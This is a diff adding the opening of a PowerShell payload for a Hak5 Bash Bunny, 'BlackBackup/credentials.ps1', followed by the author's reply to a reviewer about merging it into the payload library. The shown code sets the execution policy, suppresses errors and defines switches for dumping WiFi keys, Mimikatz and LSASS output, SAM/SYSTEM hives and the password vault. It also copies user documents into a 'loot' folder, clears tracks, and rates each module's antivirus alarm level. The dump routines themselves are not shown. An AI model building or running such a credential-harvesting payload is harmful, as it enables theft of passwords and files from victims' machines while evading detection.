payloads/library/BlackBackup/credentials.ps1

```diff
@@ -0,0 +1,560 @@
+powerShell set-executionpolicy remotesigned
+
+
+
+#-----------------------------------------------------------
+# SCRIPT GENERAL VARIABLES
+#-----------------------------------------------------------
+
+#Define script variables
+$ErrorActionPreference = "SilentlyContinue"
+$timeformat = Get-Date -Format yyyyMMddHHmmss
+$hostname = $env:computername
+$filetimestamp = $hostname+'_'+$timeformat
+
+
+
+#-----------------------------------------------------------
+# CHECK-IN YOUR PAYLOADS
+#-----------------------------------------------------------
+
+#Create SystemInfo file with basic computer configuration, keys and installed software:
+#TOTAL (all payloads) Runtime +/- 150 sec.
+#PARTIAL (no installed software in SYSTEMINFO payload AND only 1 HKCU registry hive backup) Runtime +/- 30 sec
+#To activate payload set "Y"
+#To deactivate payload set "N"
+
+$SYSTEMINFO 					= "Y" 		#+/- 30sec - Virusscanner Alarm: Low
+	$EXCLUDEINSTALLEDSOFTWARE 		=  "Y" 		#If Y then SYSTEMINFO time is reduced to +/- 6sec
+
+$WIFIDUMPKEYS 					= "Y" 		#+/- 5sec - Virusscanner Alarm: Low
+
+$MIMIKATZDUMP 					= "Y" 		#+/- 5sec - Virusscanner Alarm: Medium
+
+$LSASSDUMP 						= "N" 		#+/- 6sec - Virusscanner Alarm: Low
+
+$TAKESCREENSHOT 				= "Y" 		#+/- 1sec - Virusscanner Alarm: Low
+
+$BACKUPREGISTRY 				= "Y" 		#+/- 120sec (Total time for complete backup) - 	Virusscanner Alarm: Low
+	$HKCU 							= "Y" 		#Backup hive: HKCU (HKEY_CURRENT_USER) +/- 5sec
+	$HKLM 							= "N" 		#Backup hive: HKLM (HKEY_LOCAL_MACHINE +/- 50sec
+	$HKCR 							= "N" 		#Backup hive: HKCR (HKEY_CLASSES_ROOT) +/- 50sec
+	$HKU 							= "N" 		#Backup hive: HKU (HKEY_USERS) +/- 5sec
+	$HKCC 							= "N" 		#Backup hive: HKCC (HKEY_CURRENT_CONFIG) +/- 1sec
+
+$BACKUPSAMSYSTEM				= "N" #Y=yes N=no <> +/- 4sec - Virusscanner Alarm: High
+
+$PASSWORDVAULTDUMP				= "Y" #Y=yes N=no <> +/- 4sec - Virusscanner Alarm: Low
+
+$CLEARTRACKS 					= "Y" #Y=yes N=no <> +/- 1sec - Virusscanner Alarm: Low
+
+$FILECOPY 						= "Y" 		#Y=yes N=no <> +/- 1sec - Virusscanner Alarm: Low
+	$CURRENTUSERDESKTOP 			= "N" 		#Check Desktop of current user for backup
+	$CURRENTUSERDOCUMENTS			= "Y" 		#Check MyDocuments folder of current user for backup
+	$CURRENTUSERDOWNLOADS			= "N" 		#Check Downloads folder of current user for backup
+	$CURRENTUSERIMAGES				= "N" 		#Check Image folder of current user for backup
+	$CURRENTUSERFAVORITES			= "N" 		#Check IE Favorites folder of current user for backup
+	$ALLFILESALLUSERS				= "N" 		#Check global "User" forder for backup
+	$TEMP							= "N" 		#Check TEMP folders for backup
+	$EXTENSION						= ".pdf" 	#To copy a specific extension please add the extension in this variable. To copy all files just leave this variable empty (only quotes).
+
+
+
+#-----------------------------------------------------------
+# CREATE BASIC LOOT DIR
+#-----------------------------------------------------------
+New-Item -ItemType directory -Force -Path $PSScriptRoot\loot\$filetimestamp

```

Comment:
Hello targetdrone,

Thank you for your helpfull comment. I worked with the $switch loot directory because I have a problem with my bunny default loot directory. This folder does contain a few undeletable files and is a bit of a mess. I will take a better look at it. And by working with the $switch loot folder you know what kind of loot you will find because you know the payload that is running on the switch.

Besides that this script can be used without modification on any other device as well. When I change it to a static folder than it will be less universal.

But your comment is very usefull. Thanks. Do you think we can include the script in the Hak5 BashBunny Payloads folder after making these changes?

Thank you again for taking a look at the script!


Kind regards,

Jarno